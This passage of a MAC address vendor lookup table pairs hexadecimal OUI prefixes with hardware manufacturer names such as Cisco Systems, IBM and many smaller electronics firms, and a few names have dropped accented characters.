Communications +002716 Adachi-Syokai +002715 Rebound Telecom. +00270A IEE +002674 Electronic Solutions +00266E Nissho-denki +00265B Hitron Technologies. +002661 Irumtek +002657 OOO NPP Ekra +00264E Rail & Road Protec GmbH +0025E6 Belgian Monitoring Systems bvba +0025E1 Shanghai Seeyoo Electronic & Technology +0025DB ATI Electronics(Shenzhen) +0025D5 Robonica (Pty) +0025C9 Shenzhen Huapu Digital +0025CE InnerSpace +0025C2 RingBell +0026A0 moblic +00269A Carina System +002694 Senscient +002693 QVidium Technologies +00268D CellTel +00268E Alta Solutions +002687 corega K.K +002681 Interspiro AB +00267B GSI Helmholtzzentrum fr Schwerionenforschung GmbH +0025BB Innerint +0025B6 Telecom FM +0025AF Comfile Technology +0025AA Beijing Soul Technology +0025A9 Shanghai Embedway Information Technologies +0025A3 Trimax Wireless +00259C Cisco-Linksys +002580 Equipson +00257C Huachentel Technology Development +002575 FiberPlex Technologies +002576 Neli Technologies +002570 Eastern Communications Company Limited +002563 Luxtera +002704 Accelerated Concepts +0026FE MKD Technology +0026F8 Golden Highway Industry Development +0026EB Advanced Spectrum Technology +0026E5 AEG Power Solutions +0026DF TaiDoc Technology +0026D8 Magic Point +0026D2 Pcube Systems +0026C5 Guangdong Gosun Telecommunications +0026C0 EnergyHub +0026BF ShenZhen Temobi Science&Tech Development +0026B7 Kingston Technology Company +0026A6 Trixell +00263C Bachmann Technology GmbH & KG +002630 AcorelS +002629 Juphoon System Software +00262A Proxense +002624 Thomson +00261D COP Security System +002611 Licera AB +002617 OEM Worldwide +00260A Cisco Systems +0025FE Pilot Electronics +002605 CC Systems AB +002604 Audio Processing Technology +0025F4 KoCo Connector AG +0025EB Reutech Radar Systems (PTY) +00242A Hittite Microwave +00241D Giga-byte Technology +002417 Thomson Telecom Belgium +002418 Nextwave Semiconductor +002411 PharmaSmart +00240B Virtual Computer +00240A US Beverage Net +0024B8 free alliance sdn bhd +0024BD Hainzl Industriesysteme GmbH +0024B3 Graf-Syteco GmbH & KG +0024AE Morpho +0024A7 Advanced Video Communications +0024AC Hangzhou DPtech Technologies +00255D Morningstar +002551 SE-Elektronic GmbH +00254A RingCube Technologies +002543 Moneytech +002544 LoJack +002539 IfTA GmbH +00253B din Dietmar Nocker Facilitymanagement GmbH +00250B Centrofactor +002504 Valiant Communications Limited +0024FD Accedian Networks +0024F8 Technical Solutions Company +0024F1 Shenzhen Fanhai Sanjiang Electronics +0024EC United Information Technology +00249B Action Star Enterprise +002499 Aquila Technologies +002488 Centre For Development Of Telematics +002494 Shenzhen Baoxin Tech +00247A FU YI Cheng Technology +002475 Compass System(Embedded Dept.) +00246E Phihong USA +002467 AOC International (Europe) GmbH +002469 Smart Doorphones +002462 Rayzone +002458 PA Bastion CC +00245D Terberg besturingstechniek +002455 MuLogic BV +002450 Cisco Systems +00244B Perceptron +00253A CEVA +002531 Cloud Engines +00252F Energy +00252A Chengdu GeeYa Technology +002521 Logitek Electronic Systems +00251C EDT +002517 Venntis +002510 Pico-Tesla Magnetic Therapies +0024E5 Seer Technology +0024E0 DS Tech +0024DE Global Technology +0024D9 Bicom +0024CB Autonet Mobile +0024CD Willow Garage +0024C6 Hager Electro SAS +00243A Ludl Electronic Products +002434 Lectrosonics +00242E Datastrip +002296 LinoWave +00228F Cnrs +002290 Cisco Systems +00228A Teratronik elektronische systeme gmbh +00227E Chengdu 30Kaitian Communication IndustryLtd +00227D YE Data +002278 Shenzhen Tongfang Multimedia Technology +002272 American Micro-Fuel Device +002271 Jger Computergesteuerte Metechnik GmbH. +00226E Gowell Electronic Limited +002358 Systel SA +002357 Pitronot Technologies and Engineering P.T.E. +002352 Datasensor +00234B Inyuan Technology +002346 Vestac +00233F Purechoice +002338 OJ-Electronics A/S +002333 Cisco Systems +00232F Advanced Card Systems +00232A eonas IT-Beratung und -Entwicklung GmbH +0022C1 Active Storage +0022C2 Proview Eletrnica do Brasil Ltda +0022BC Jdsu France SAS +0022B5 Novita +0022AF Safety Vision +0022A2 Xtramus Technologies +00229D Pyung-hwa Ind.co. +002327 Shouyo Electronics +002323 Zylin AS +00231A ITF +002311 Gloscom +00230C Clover Electronics +002305 Cisco Systems +0022FF Nivis +0022FE Advanced Illumination +002300 Cayee Computer +0022F6 Syracuse Research +0022F9 Pollin Electronic GmbH +0023AD Xmark +0023A7 Redpine Signals +0023A1 Trend Electronics +0023A6 E-Mon +00239A EasyData Hardware GmbH +002394 Samjeon +002390 Algolware +002386 Tour & Andersson AB +002405 Dilog Nordic AB +0023F5 Wilo SE +0023FE Biodevices +0023F0 Shanghai Jinghan Weighing Apparatus +0023EB Cisco Systems +0023E5 IPaXiom Networks +0023E6 Pirkus +0023D9 Banner Engineering +0023D3 AirLink WiFi Networking +0023D8 Ball-It Oy +0023C6 SMC +0023C0 Broadway Networks +0023B3 Lyyn AB +0022F5 Advanced Realtime Tracking GmbH +0022EF iWDL Technologies +0022E8 Applition +0022E3 Amerigon +0022D5 Eaton Electrical Group Data Center Solutions - Pulizzi +0022DC Vigil Health Solutions +0022D6 Cypak AB +0022D0 Polar Electro Oy +0022CB Ionodes +0022C6 Sutus +002380 Nanoteq +00237A RIM +002377 Isotek Electronics +002371 Soam Systel +00236A SmartRG +00235E Cisco Systems +00225A Garde Security AB +002254 Bigelow Aerospace +002251 Lumasense Technologies +00224B Airtech Technologies +002245 Leine & Linde AB +002242 Alacron +00223B Communication Networks +002146 Sanmina-SCI +00213D Cermetek Microelectronics +00213E TomTom +002135 Alcatel-lucent +00213A Winchester Systems +002130 Keico Hightech +00217E Telit Communication s.p.a +002178 Matuschek Messtechnik GmbH +002172 Seoultek Valley +002166 NovAtel +002165 Presstek +00215F Ihse Gmbh +002153 SeaMicro +002158 Style Flying Technology +0021AC Infrared Integrated Systems +0021A5 Erlphase Power Technologies +00219F Satel OY +00218A Electronic Design and Manufacturing Company +00218B Wescon Technology +002185 Micro-star Int'l +001FF9 Advanced Knowledge Associates +001FF2 VIA Technologies +001FED Tecan Systems +001FE6 Alphion +001FE0 EdgeVelocity +001FDA Nortel Networks +002209 Omron Healthcare +002203 Glensound Electronics +002200 IBM +0021F6 Oracle +0021F0 EW3 Technologies +0021EA Bystronic Laser AG +0021E3 SerialTek +0021DE Firepro Wireless +0021DD Northstar Systems +0021D7 Cisco Systems +002235 Strukton Systems bv +002234 Corventis +00222F Open Grid Computing +002228 Breeze Innovations +002222 Schaffner Deutschland GmbH +00221C Private +00220F MoCA (Multimedia over Coax Alliance) +00212B MSA Auer +00211D Dataline AB +002124 Optos Plc +002118 Athena Tech +002111 Uniphone +002107 Seowonintech +002101 Aplicaciones Electronicas Quasar (AEQ) +002102 UpdateLogic +0021D0 Global Display Solutions Spa +0021CB SMS Tecnologia Eletronica Ltda +0021C4 Consilium AB +0021B8 Inphi +0021B1 Digital Solutions +001F7B TechNexion +001F7C Witelcom AS +001F79 Lodam Electronics A/S +001F74 Eigen Development +001F6F Fujian Sunnada Communication +001F63 JSC Goodwin-Europa +001F6A PacketFlux Technologies +001F69 Pingood Technology +001F57 Phonik Innovation +001F21 Inner Mongolia Yin An Science & Technology Development +001F22 Source Photonics +001F1C Kobishi Electric +001F15 Bioscrypt +001F10 Toledo DO Brasil Industria DE Balancas Ltda +001F0C Intelligent Digital Services GmbH +001F07 Azteq Mobile +001FAA Taseon +001FA5 Blue-White Industries +001FA0 A10 Networks +001F99 Seronicsltd +001F9B Posbro +001F94 Lascar Electronics +001F8D Ingenieurbuero Stark GmbH und Ko. KG +001F89 Signalion GmbH +001ED0 Ingespace +001ECB RPC Energoautomatika +001EC4 Celio +001EBE Cisco Systems +001EBD Cisco Systems +001EB8 Fortis +001EB1 Cryptsoft +001EA6 Best IT World (India) Pvt. +001EAC Armadeus Systems +001E9F Visioneering Systems +001EA0 XLN-t +001EF4 L-3 Communications Display Systems +001EF9 Pascom Kommunikations systeme GmbH. +001EFA Protei +001EE8 Mytek +001EED Adventiq +001EE7 Epic Systems +001ED7 H-Stream Wireless +001E6B Cisco Spvtg +001E72 PCS +001E66 Resol Elektronische Regelungen Gmbh +001E5F KwikByte +001E53 Further Tech +001E9A Hamilton Bonaduz AG +001E93 CiriTech Systems +001E8E Hunkeler AG +001E88 Andor System Support +001E82 SanDisk +001E81 CNB Technology +001E7C Taiwick Limited +001E77 Air2App +001F50 Swissdis AG +001F49 Manhattan TV +001F4A Albentia Systems +001F44 GE Transportation Systems +001F2F Berker GmbH & KG +001F34 Lung Hwa Electronics +001F28 HPN Supply Chain +001FD5 Microrisc S.r.o. +001FD6 Shenzhen Allywll +001FD0 Giga-byte Technology +001FC9 Cisco Systems +001FBD Kyocera Wireless +001FB1 Cybertech +001FB6 Chi Lin Technology +001D02 Cybertech Telecom Development +001CF6 Cisco Systems +001CEA Scientific-Atlanta +001CE9 Galaxy Technology Limited +001CE5 MBS Electronic Systems GmbH +001CE0 Dasan TPS +001CD9 GlobalTop Technology +001CD2 King Champion (Hong Kong) Limited +001CCD Alektrona +001CC6 ProStor Systems +001CBA VerScient +001CB0 Cisco Systems +001CB5 Neihua Network Technology,LTD.(NHN) +001CB6 Duzon CNT +001CA9 Audiomatica Srl +001D5F Overspeed Sarl +001D53 S&O Electronics (Malaysia) Sdn. Bhd. +001D4E TCM Mobile +001D4D Adaptive Recognition Hungary +001D49 Innovation Wireless +001D3D Avidyne +001D43 Shenzhen G-link Digital Technology +001E17 STN BV +001E1C SWS Australia Limited +001E12 Ecolab +001E0D Micran +001E06 Wibrain +001DFF Network Critical Solutions +001E00 Shantou Institute of Ultrasonic Instruments +001DFA Fujian Landi Commercial Equipment +001DF3 SBS Science & Technology +001DEE Nextvision Sistemas Digitais DE Televiso LTDA. +001DED Grid Net +001DDE Zhejiang Broadcast&Television Technology +001DE7 Marine Sonic Technology +001DD7 Algolith +001DD8 Microsoft +001DCB Exns Development Oy +001DC6 SNR +001DC5 Beijing Jiaxun Feihong Electricial +001DBF Radiient Technologies +001DB8 Intoto +001D36 Electronics OF India Limited +001D31 Highpro International R&D +001D2A Shenzhen Bul-tech +001D23 Sensus +001D24 Aclara Power-Line Systems +001D1B Sangean Electronics +001D1E Kyushu TEN +001D15 Shenzhen Dolphin Electronic +001D0E Agapha Technology +001DB3 HPN Supply Chain +001DAE Chang Tseng Technology +001DA9 Castles Technology +001DA2 Cisco Systems +001D9C Rockwell Automation +001D9B Hokuyo Automatic +001D96 WatchGuard Video +001D8F PureWave Networks +001D8A TechTrex +001D89 VaultStor +001D7F Tekron International +001D83 Emitech +001D79 Signamax +001D66 Hyundai Telecom +001D6D Confidant International +001E42 Teltonika +001E3C Lyngbox Media AB +001E2F DiMoto +001E36 Ipte +001E29 Hypertherm +001E23 Electronic Educational Devices +001C0C Tanita +001C06 Siemens Numerical Control, Nanjing +001BFF Millennia Media +001BFA G.i.N. mbH +001BE3 Health Hero Network +001BE5 802automation Limited +001BE4 Townet SRL +001BDE Renkus-Heinz +001BD2 Ultra-x Asia Pacific +001C6B Covax +001C64 Landis+Gyr +001C5F Winland Electronics +001C53 Synergy Lighting Controls +001C58 Cisco Systems +001C4E Tasa International Limited +001C47 Hangzhou Hollysys Automation +001C49 Zoltan Technology +001C48 WiDeFi +001C3B AmRoad Technology +001C42 Parallels +001B72 Sicep +001B6D Midtronics +001B6B Swyx Solutions AG +001B6C LookX Digital Media BV +001B66 Sennheiser electronic GmbH & KG +001B5F Alien Technology +001B5A Apollo Imaging Technologies +001B53 Cisco Systems +001B47 Futarque A/S +001B4C Signtech +001B4E Navman New Zealand +001B40 Network Automation mxc AB +001C9E Dualtech IT AB +001C97 Enzytek Technology +001C98 Lucky Technology (hk) Company Limited +001C92 Tervela +001C8B MJ Innovations +001C86 Cranite Systems +001C85 Eunicorn +001C81 NextGen Venturi +001C72 Mayer & Cie GmbH & KG +001C77 Prodys +001B34 Focus System +001B39 Proxicast +001B3B Yi-Qing +001B28 Polygon +001B2D Med-Eng Systems +001B1F Delta - Danish Electronics, Light & Acoustics +001B18 Tsuken Electric Ind. +001B13 Icron Technologies +001B0C Cisco Systems +001BA7 Lorica Solutions +001BA2 IDS Imaging Development Systems GmbH +001B96 General Sensing +001B9B Hose-McCann Communications +001B8F Cisco Systems +001B85 MAN Diesel SE +001B7E Beckmann GmbH +001B79 Faiveley Transport +001C36 iNEWiT NV +001C2F Pfister GmbH +001C28 Sphairon Technologies GmbH +001C1E emtrion GmbH +001C19 secunet Security Networks AG +001C0B SmartAnt Telecom +001C0D G-Technology +001BCB Pempek Systems +001BC4 Ultratec +001BAE Micro Control Systems +001BA8 Ubi&mobi +001B05 YMC AG +001B00 Neopost Technologies +001AF9 AeroVIronment (AV) +001AEF Loopcomm Technology +001AE3 Cisco Systems +001AEA Radio Terminal Systems +001A26 Deltanode Solutions AB +001A2B Ayecom Technology +001A1F Coastal Environmental Systems +001A1A Gentex/Electro-Acoustic Products +001A13 Wanlida Group +001A0E Cheng Uei Precision Industry +001A0C Swe-Dish Satellite Systems AB +001A07 Arecont Vision +001A00 Matrix +001AD0 Albis Technologies AG +001AD5 KMC Chain Industrial +001AD7 Christie Digital Systems +001AC9 Suzuken +001ABA Caton Overseas Limited +001ABF Trumpf Laser Marking Systems AG +001A81 Zelax +001A88 Venergy +001A7A Lismore Instruments Limited +001A70 Cisco-Linksys +001A72 Mosart Semiconductor +001A64 IBM +001A56 ViewTel +001A5B NetCare Service +001A5F KitWorks.fi +0019B6 Euro Emme s.r.l. +0019A3 asteel electronique atlantique +0019A8 WiQuest Communications +0019AA Cisco Systems +0019AF Rigol Technologies +001997 Soft Device Sdn Bhd +00199C Ctring +001A43 Logical Link Communications +001A48 Takacom +001A4A Qumranet +001A3C Technowave +001A30 Cisco Systems +001A35 Bartec Gmbh +001A37 Lear +0019F2 Teradyne K.K. +0019F7 Onset Computer +0019DF Thomson +0019E6 Toyo Medic +0019EB Pyronix +0019CC RCG (HK) +0019D3 Trak Microwave +0019D8 Maxfor +0019C2 Equustek Solutions +00198B Novera Optics Korea +00198D Ocean Optics +001986 Cheng Hongjian +001973 Zeugma Systems +00197A MAZeT GmbH +001967 Teldat Sp.J. +00196C Etrovision Technology +00196E Metacom (Pty) +001AAC Corelatus AB +001AAE Savant Systems +001AB3 Visionite +001AA7 Torian Wireless +001A9E Icon Digital International Limited +001AA3 Delorme +001AA5 BRN Phoenix +001AA4 Future University-Hakodate +001A97 fitivision technology +001A8D Avecs Bergen Gmbh +001962 Commerciant +00195D ShenZhen XinHuaTong Opto Electronics +001951 Netcons, S.r.o. +001956 Cisco Systems +00194A Testo AG +001943 Belden +001873 Cisco Systems +001875 AnaCise Testnology Pte +00187A Wiremold +00186E 3Com +00185E Nexterm +001860 SIM Technology Group Shanghai Simcom +001865 Siemens Healthcare Diagnostics Manufacturing +001903 Bigfoot Networks +0018F9 Vvond +0018F2 Beijing Tianyu Communication Equipment +0018EB Blue Zen Enterprises Private Limited +0018ED Accutech Ultrasystems +0018E6 Computer Hardware Design SIA +0018DF The Morey +001937 CommerceGuard AB +00192E Spectral Instruments +001932 Gude Analog- und Digialsysteme GmbH +001922 CM Comandos Lineares +001927 ImCoSys +001929 2m2b Montadora de Maquinas Bahia Brasil Ltda +00190F Advansus +001916 PayTec AG +00191B Sputnik Engineering AG +001908 Duaxes +00190A Hasware +0017D6 Bluechips Microhouse +0017DB Canko Technologies +0017CC Alcatel-Lucent +0017C5 SonicWALL +0017B9 Gambro Lundia AB +0017BE Tratec Telecom +0017C0 PureTech Systems +001852 StorLink Semiconductors +001859 Strawberry Linux +00184B Las Vegas Gaming +001846 Crypto +001829 Gatsometer +001835 Thoratec / ITC +001824 Kimaldi Electronics +001822 CEC Telecom +0017B2 SK Telesys +0017AD AceNet +0017A6 Yosin Electronics +0017A1 3soft +00179C Deprag Schulz Gmbh u. +001790 Hyundai Digitech +001795 Cisco Systems +0018CE Dreamtech +0018D3 Teamcast +0018C2 Firetide +0018C4 Raba Technologies +0018C9 EOps Technology Limited +0018BD Shenzhen Dvbworld Technology +0018B1 IBM +0018B6 S3C +0018A3 Zippy Technology +0018AA Protec Fire Detection plc +001816 Ubixon +00181D Asia Electronics +001811 Neuros Technology International +001801 Actiontec Electronics +0017F5 LIG Neoptek +0017FA Microsoft +0017FC Suprema +00189E Omnikey GmbH. +001894 NPCore +001899 ShenZhen jieshun Science&Technology Industry +001886 El-tech +001888 Gotive a.s. +001881 Buyang Electronics Industrial +0016D4 Compal Communications +0016D9 Ningbo Bird +0016C8 Cisco Systems +0016CD Hiji High-tech +0016C1 Eleksen +0016BA Weathernews +00164F World Ethnic Broadcastin +001648 SSD Company Limited +001643 Sunhillo +00163E Xensource +001637 Citel SpA +00162B Togami Electric Mfg.co. +001755 GE Security +001747 Trimble +001749 Hyundae Yong-o-sa +00174E Parama-tech +001732 Science-technical Center Rissa +001734 ADC Telecommunications +001739 Bright Headphone Electronics Company +00172D Axcen Photonics +001624 Teneros +001613 LibreStream Technologies +001618 Hivion +00161F Sunwavetec +00160E Optica Technologies +001607 Curves International +001609 Unitech electronics +001608 Sequans Communications +001602 Ceyon Technology +0015FB setex schermuly textile computer gmbh +0015F6 Science AND Engineering Services +001782 LoBenn +001789 Zenitron +00176D Core +001771 APD Communications +001776 Meso Scale Diagnostics +001761 Private +001768 Zinwave +00175C Sharp +00175A Cisco Systems +001709 Exalt Communications +001704 Shinco Electronics Group +0016FD Jaty Electronics +0016F1 OmniSense +0016F6 Video Products Group +0016F8 Aviqtech Technology +0016E5 Fordley Development Limited +0016DE Fast +00167E Diboss.co. +001680 Bally Gaming + Systems +001679 eOn Communications +00166E Arbitron +001667 A-TEC Subsystem +00165B Grip Audio +001654 Flex-P Industries Sdn. Bhd. +001721 Fitre +001726 m2c Electronic Technology +00171A Winegard Company +00171F IMV +001713 Tiger NetCom +00170E Cisco Systems +0016A9 2EI +0016AE Inventel +00169D Cisco Systems +00169F Vimtron Electronics +0016A4 Ezurio +001691 Moser-Baer AG +001698 T&A Mobile Phones +00168C DSL Partner AS +001685 Elisa Oyj +0015EF NEC Tokin +0015E3 Dream Technologies +0015D9 PKC Electronics Oy +0015D2 Xantech +0015CC Uquest +0015CB Surf Communication Solutions +0015CD Exartech International +0015C6 Cisco Systems +0015BB SMA Solar Technology AG +0014D5 Datang Telecom Technology , LCD,Optical Communication Br +0014DA Huntleigh Healthcare +0014CE NF +0014C8 Contemporary Research +0014BB Open Interface North America +0014B6 Enswer Technology +0014AC Bountiful WiFi +0014B1 Axell Wireless Limited +001476 MultiCom Industries Limited +001471 Eastern Asia Technology Limited +00146A Cisco Systems +001463 Idcs N.V. +001465 Novo Nordisk A/S +001464 Cryptosoft +00145E IBM +001457 T-vips AS +001452 Calculex +001592 Facom UK (Melksham) +00158B Park Air Systems +001584 Schenck Process GmbH +00157F ChuanG International Holding +00157A Telefin +001575 Nevis Networks +00156E A. W. Communication Systems +001567 Radwin +001569 Peco II +001568 Dilithium Networks +001562 Cisco Systems +001503 Proficomms S.r.o. +001505 Actiontec Electronics +001504 Game Plus +0014FE Artech Electronics +0014F7 Crevis +0014F2 Cisco Systems +0014EB AwarePoint +0014E1 Data Display AG +00155B Sampo +00154F one RF Technology +001546 ITG Worldwide Sdn Bhd +00153F Alcatel Alenia Space Italia +001541 StrataLight Communications +00153A Shenzhen Syscan Technology +0015BF technicob +0015B4 Polymap Wireless +0015AA Rextechnik International +0015A5 DCI +00159E Mad Catz Interactive +001597 Aeta Audio Systems +00149E UbONE +001499 Helicomm +001492 Liteon, Mobile Media Solution SBU +00148B Globo Electronic GmbH & KG +00148D Cubic Defense Simulation Systems +001486 Echo Digital Audio +00147D Aeon Digital International +001533 Nadam.co. +00152E PacketHop +001527 Balboa Instruments +001520 Radiocrafts AS +00151B Isilon Systems +001516 Uriel Systems +001511 Data Center Systems +00150A Sonoa Systems +00131F NxtPhase T&D +001318 Dgstation +00130C HF System +001313 GuangZhou Post & Telecom Equipment +001354 Zcomax Technologies +001358 Realm Systems +00135D Nttpc Communications +00134F Tranzeo Wireless Technologies +001348 Artila Electronics +001342 Vision Research +00133C Quintron Systems +001341 Shandong New Beiyang Information Technology +001329 Vsst +001330 Euro Protection Surveillance +001335 VS Industry Berhad +00132F Interactek +0012C4 Viseon +0012D0 Gossen-Metrawatt-GmbH +0012CA Mechatronic Brick Aps +0012BA FSI Systems +0012AE HLS Hard-line Solutions +0012B3 Advance Wireless Technology +0012AD IDS GmbH +00144D Intelligent Systems +001441 Innovation Sound Technology +001448 Inventec Multimedia & Telecom +00143A Raytalk International SRL +001435 CityCom +00142E 77 Elektronika Kft. +001429 V Center Technologies +001427 JazzMutant +00141E P.A. Semi +0012F9 Uryu Seisaku +001300 It-factory +001305 Epicom +001306 Always On Wireless +0012F4 Belco International +0012EF OneAccess SA +0012EA Trane +0012E9 Abbey Systems +0012DC SunCorp Industrial Limited +0012E3 Agat-RT +0012D7 Invento Networks +0013F0 Wavefront Semiconductor +0013EB Sysmaster +0013E6 Technolution +0013DF Ryvor +0013D9 Matrix Product Development +0013DA Diskware +0013CD MTI +0013D3 Micro-star International +0013C1 Asoka USA +0013BC Artimi +0013B7 Scantech ID +0013AB Telemotive AG +0013B2 Carallon Limited +0013B1 Intelligent Control Systems (Asia) Pte +0013A4 KeyEye Communications +00139F Electronics Design Services +001398 TrafficSim +00138C Kumyoung.Co.Ltd +001391 Ouen +00137C Kaicom +001383 Application Technologies and Engineering Research Laboratory +001364 Paradigm Technology. +001369 Honda Electron +00136A Hach Lange Sarl +001418 C4Line +00141D LTi Drives Gmbh +001411 Deutschmann Automation GmbH & KG +004501 Versus Technology +001403 Renasis +0013FC SiCortex +0013F5 Akimbi Systems +0013F6 Cintech +001286 Endevco +00127F Cisco Systems +001278 International Bar Code +001273 Stoke +001266 Swisscom Hospitality Services SA +001265 Enerdyne Technologies +00125B Kaimei Electroni +0011D2 Perception Digital +0011D7 eWerks +0011D1 Soft Imaging System GmbH +0011C2 United Fiber Optic Communication +0011CB Jacobsons AB +0011BB Cisco Systems +0011BC Cisco Systems +0011AA Uniclass Technology +0011AF Medialink-i +001200 Cisco Systems +0011FB Heidelberg Engineering GmbH +0011F6 Asia Pacific Microsystems +0011F1 QinetiQ +0011EA Iwics +0011E3 Thomson +0011DE Eurilogic +0011E4 Danelec Electronics A/S +001230 Picaso Infocommunication +001226 Japan Direx +001220 Cadco Systems +00121A Techno Soft Systemnics +00121F Harding Instruments +001213 Metrohm AG +00120D Advanced Telecommunication Technologies +001207 Head Strong International Limited +00120E AboCom +00117A Singim International +001173 Smart Storage Systems +001167 Integrated System Solution +00116D American Time and Signal +001163 System SPA DEPT. Electronics +001156 Pharos Systems NZ +00115D Cisco Systems +0012A7 ISR Technologies +0012A0 NeoMeridian Sdn Bhd +00129B E2S Electronic Engineering Solutions +001294 Sumitomo Electric Device Innovations +00128B Sensory Networks +001285 Gizmondo Europe +0011A9 Moimstone +0011A3 LanReady Technologies +001197 Monitoring Technologies Limited +00119C EP&T Energy +00118D Hanchang System +001192 Cisco Systems +001186 Prime Systems +00117F Neotune Information Technology +001260 Stanton Magnetics +001256 LG Information & COMM. +00124F Pentair Thermal Management +00124A Dedicated Devices +001249 Delta Elettronica +001243 Cisco Systems +00123C Second Rule +001148 Prolon Control Systems +00114D Atsumi Electric +00114E 690885 Ontario +001141 GoodMan +00113B Micronet Communications +001135 Grandeye +001126 Venstar +000EB9 Hashimoto Electronics Industry +000EBA Hanmi Semiconductor +000EAC Mintron Enterprise +000EA0 NetKlass Technology +000EA7 Endace Technology +000E9A BOE Technology Group +000E99 Spectrum Digital +00112B NetModule AG +001120 Cisco Systems +001125 IBM +001119 Solteras +001113 Fraunhofer Fokus +001106 Siemens NV (Belgium) +00110D Sanblaze Technology +001101 CET Technologies Pte +000FB3 Actiontec Electronics +000FA6 S2 Security +000FAD FMN communications GmbH +000F9B Ross Video Limited +000F9E Murrelektronik GmbH +000FA1 Gigabit Systems +000F95 Elecom,ltd Laneed Division +000F96 Telco Systems +000F8F Cisco Systems +000F88 Ametek +000F83 Brainium Technologies +000F51 Azul Systems +000F44 Tivella +000F43 Wasabi Systems +000F4A Kyushu-kyohan +000F3E CardioNet +000F3A Hisharp +000F30 Raza Microelectronics +000F2F W-linx Technology +000F36 Accurate Techhnologies +000F2A Cableware Electronics +000F76 Digital Keystone +000F70 Wintec Industries +000F75 First Silicon Solutions +000F7C ACTi +000F69 SEW Eurodrive GmbH & KG +000F63 Obzerv Technologies +000F64 D&R Electronica Weesp BV +000F5D Genexis BV +000F56 Continuum Photonics +000EEB Sandmartin(zhong shan)Electronics +000EEC Orban +000EF1 Ezquest +000EDE Remec +000EE5 bitWallet +000ECC Tableau +000ED9 Aksys +000ECB VineSys Technology +000ED2 Filtronic plc +000EBF Remsdaq Limited +000EC6 Asix Electronics +000F23 Cisco Systems +000F1D Cosmo Techs +000F10 RDM +000F1E Chengdu KT Electricof High & New Technology +000F0B Kentima Technologies AB +000F04 cim-usa +000EFE EndRun Technologies +000EF8 SBC ASI +000EFD Fujinon +000FFB Nippon Denso Industry +000FF8 Cisco Systems +000FF2 Loud Technologies +000FF7 Cisco Systems +000FE5 Mercury Security +000FE6 MBTech Systems +000FEB Cylon Controls +000FDF Solomon Technology +000FD8 Force +000FD3 Digium +000FC6 Eurocom Industries A/S +000FC5 KeyMed +000FC0 Delcomp +000FB4 Timespace Technology +000FB9 Adaptive Instruments +000D4D Ninelanes +000D54 3Com +000D45 Tottori Sanyo Electric +000D48 Aewin Technologies +000D40 Verint Loronix Video Solutions +000D39 Network Electronics +000D33 Prediwave +000D34 Shell International Exploration and Production +000D2D NCT Deutschland GmbH +000D26 Primagraphics Limited +000D21 Wiscore +000D14 Vtech Innovation LP dba Advanced American Telephones +000D13 Wilhelm Rutenbeck GmbH&Co.KG +000D1A Mustek System +000D0E Inqnet Systems +000D01 P&E Microcomputer Systems +000D02 NEC Platforms +000D07 Calrec Audio +000E8D Systems in Progress Holding GmbH +000E94 Maas International BV +000E87 adp Gauselmann GmbH +000E81 Devicescape Software +000E88 Videotron +000E75 New York Air Brake +000E7A GemWon Communications +000E66 Hitachi Industry & Control Solutions +000DF6 Technology Thesaurus +000DFD Huges Hi-Tech +000E02 Advantech AMT +000DEA Kingtel Telecommunication +000DEF Soc. Coop. Bilanciai +000DDD Profilo Telra Elektronik Sanayi ve Ticaret. A. +000DDE Joyteck +000DE3 AT Sweden AB +000DD0 TetraTec Instruments GmbH +000DD7 Bright +000E61 Microtrol Limited +000E5A Telefield +000E54 AlphaCell Wireless +000E4E Waveplus Technology +000E53 AV Tech +000E47 NCI System +000E41 Nihon Mechatronics +000E42 Motic Incoporation +000E3C Transact Technologies +000E36 Heinesys +000DB1 Japan Network Service +000DA9 T.e.a.m. S.L. +000DAC Japan CBM +000DA4 Dosch & Amand Systems AG +000D97 ABB/Tropos +000D98 S.W.A.C. Schmitt-Walter Automation Consult GmbH +000D8A Winners Electronics +000D91 Eclipse (HQ Espana) S.L. +000D7F Midas Communication Technologies PTE ( Foreign Branch) +000D79 Dynamic Solutions +000D73 Technical Support +000D7A DiGATTO Asia Pacific Pte +000D6C M-Audio +000D5A Tiesse SpA +000D60 IBM +000D59 Amity Systems +000DCB Petcomkorea +000DC4 Emcore +000DBE Bel Fuse Europe +000DB8 Schiller AG +000DBD Cisco Systems +000E30 Aeras Networks +000E29 Shester Communications +000E23 Incipient +000E24 Huwell Technology +000E16 SouthWing S.L. +000E1D Arion Technology +000E09 Shenzhen Coship Software +000E11 BDT Bro und Datentechnik GmbH &KG +000BC8 AirFlow Networks +000BCF Agfa NDT +000BC3 Multiplex +000BBC En Garde Systems +000BC1 Bay Microsystems +000BB0 Sysnet Telematica srl +000BB5 nStor Technologies +000BA6 Miyakawa Electric Works +000BAB Advantech Technology (china) +000B99 SensAble Technologies +000B9A Shanghai Ulink Telecom Equipment +000B9F Neue Elsa Gmbh +000B94 Digital Monitoring Products +000C1D Mettler & Fuchs AG +000C22 Double D Electronics +000C0F Techno-One +000C16 Concorde Microsystems +000C0A Guangdong Province Electronic Technology Research Institute +000BFD Cisco Systems +000BF7 Nidek +000BFC Cisco Systems +000BFE Castel Broadband Limited +000CA4 Prompttec Product Management GmbH +000C98 Letek Communications +000C9D UbeeAirWalk +000C9F NKE +000C8C Kodicom +000C91 Riverhead Networks +000C80 Opelcomm +000C85 Cisco Systems +000CD0 Symetrix +000CD5 Passave +000CDC Becs Technology +000CC9 Ilwoo Data & Technology +000CB0 Star Semiconductor +000CB6 Nanjing SEU Mobile & Internet Technology +000CBD Interface Masters +000CC2 ControlNet (India) Private Limited +000CAF TRI Term +000C71 Wybron +000C78 In-Tech Electronics Limited +000C7D Teikoku Electric MFG. +000C65 Sunin Telecom +000C6A Mbari +000C6C Elgato Systems +000B88 Vidisco +000B8D Avvio Networks +000B7B Test-Um +000B7A L-3 Linkabit +000B7C Telex Communications +000B81 Kaparel +000B6E Neff Instrument +000B75 Iosoft +000B69 Franke Finland Oy +0091D6 Crystal Group +000B62 ib-mohnen KG +000B59 ScriptPro +000C52 Roll Systems +000C57 Mackie Engineering Services Belgium Bvba +000C59 Indyme Electronics +000C5E Calypso Medical +000C4B Cheops Elektronik +000C46 Allied Telesyn +000C3D Glsystech +000C33 Compucase Enterprise +000C36 Sharp Takaya Electronics Industry +000C2C Enwiser +000CFB Korea Network Systems +000CEF Open Networks Engineering +000CF4 Akatsuki Electric Mfg.co. +000CE8 GuangZhou AnJuBao +000CE1 The Open Group +000CCF Cisco Systems +000BEB Systegra AG +000BF0 MoTEX Products +000BDD Tohoku Ricoh +000BE4 Hosiden +000BD8 Industrial Scientific +000BD4 Beijing Wise Technology & Science DevelopmentLtd +000A1D Optical Communications Products +000A1F ART Ware 